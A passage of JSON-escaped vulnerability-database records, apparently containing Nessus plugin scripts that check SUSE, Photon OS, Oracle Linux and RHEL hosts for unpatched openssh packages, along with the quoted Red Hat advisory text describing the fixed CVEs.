Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-fips-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-66.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T01:06:55", "description": "An update of the openssh package has been released.", "edition": 17, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Openssh PHSA-2017-0001", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:openssh", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0001_OPENSSH.NASL", "href": "https://www.tenable.com/plugins/nessus/121665", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0001. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121665);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10012\");\n\n script_name(english:\"Photon OS 1.0: Openssh PHSA-2017-0001\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openssh package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-16.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-10009\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-debuginfo-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-debuginfo-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-debuginfo-7.4p1-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:42:31", "description": "From Red Hat Security Advisory 2017:2029 :\n\nAn update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-09T00:00:00", "title": "Oracle Linux 7 : openssh (ELSA-2017-2029)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:openssh-server-sysvinit", "p-cpe:/a:oracle:linux:openssh", "p-cpe:/a:oracle:linux:openssh-keycat", "p-cpe:/a:oracle:linux:openssh-server", "p-cpe:/a:oracle:linux:openssh-askpass", "p-cpe:/a:oracle:linux:openssh-ldap", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:openssh-clients", "p-cpe:/a:oracle:linux:openssh-cavs", "p-cpe:/a:oracle:linux:pam_ssh_agent_auth"], "id": "ORACLELINUX_ELSA-2017-2029.NASL", "href": "https://www.tenable.com/plugins/nessus/102296", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2029 and \n# Oracle Linux Security Advisory ELSA-2017-2029 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102296);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\", \"CVE-2016-6210\", \"CVE-2016-6515\");\n script_xref(name:\"RHSA\", value:\"2017:2029\");\n\n script_name(english:\"Oracle Linux 7 : openssh (ELSA-2017-2029)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2029 :\n\nAn update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-August/007091.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-server-sysvinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-askpass-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-cavs-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-clients-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-keycat-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-ldap-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-server-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-server-sysvinit-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"pam_ssh_agent_auth-0.10.3-1.11.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-cavs / openssh-clients / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T05:08:15", "description": "An update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-02T00:00:00", "title": "RHEL 7 : openssh (RHSA-2017:2029)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:openssh", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:openssh-askpass", "p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssh-ldap", "p-cpe:/a:redhat:enterprise_linux:openssh-server-sysvinit", "p-cpe:/a:redhat:enterprise_linux:openssh-clients", "p-cpe:/a:redhat:enterprise_linux:openssh-server", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:openssh-cavs", "p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth", "p-cpe:/a:redhat:enterprise_linux:openssh-keycat"], "id": "REDHAT-RHSA-2017-2029.NASL", "href": "https://www.tenable.com/plugins/nessus/102112", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2029. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102112);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\", \"CVE-2016-6210\", \"CVE-2016-6515\");\n script_xref(name:\"RHSA\", value:\"2017:2029\");\n\n script_name(english:\"RHEL 7 : openssh (RHSA-2017:2029)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.\"\n );\n # https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3395ff0b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:2029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-10009\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-10011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-10012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-10708\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-server-sysvinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/01\");\n 